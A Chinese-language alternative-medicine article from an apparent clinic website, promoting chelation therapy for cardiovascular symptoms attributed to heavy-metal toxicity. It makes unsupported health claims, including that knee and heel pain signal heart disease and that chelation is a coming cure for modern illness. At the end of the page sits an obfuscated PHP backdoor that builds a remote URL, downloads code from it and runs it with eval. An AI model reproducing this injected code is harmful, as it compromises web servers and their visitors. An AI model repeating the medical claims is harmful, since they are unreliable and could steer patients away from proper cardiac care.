收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 現代醫學對心臟及心血管的檢查就沒有死角嗎?
現代醫學對心臟及心血管的檢查就沒有死角嗎? 列印 E-mail
        許多人常不自覺的深呼吸,胸悶、胸痛、意識到脈搏或心臟強烈跳動……,其實都是心血管疾病的前兆,甚而包含膝蓋痛、腳後跟痛都可能與心血管疾病有關,不可不慎!但是在心臟科X光的檢查與肺的檢查都正常之後,心臟科醫師通常會說,這些症狀是因為自律神經失調、焦慮、身心症…所造成。

可惜的是,既然診斷這麼明確,為什麼症狀無法改善與治療?更可惜的是,心肌梗塞百分之九十五以上都是在急診室發現,更有人身體完全健康卻猝死,難道現代醫學對心臟及心血管的檢查就沒有死角嗎?

        或許我們不能很武斷的說「螯合療法」改善了心血管疾病,但至少我們可以說「螯合療法」可以改善這些症狀;也就是說,這些症狀可能是因為體內有過量有毒的重金屬所造成的!就算不是造成症狀的主要原因,相信也是造成症狀的次要原因。

因為經過治療後,很多預期中的症狀以及非預期中的症狀,都得到緩解或者消失。至於過量的定義為何:成大醫院腎臟科研究報告顯示──只要體內有有毒重金屬存在,就有可能產生疾病症狀。

所以「螯合療法」不單是治療或改善心血管疾病,也將是未來治療現代疾病的利器。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));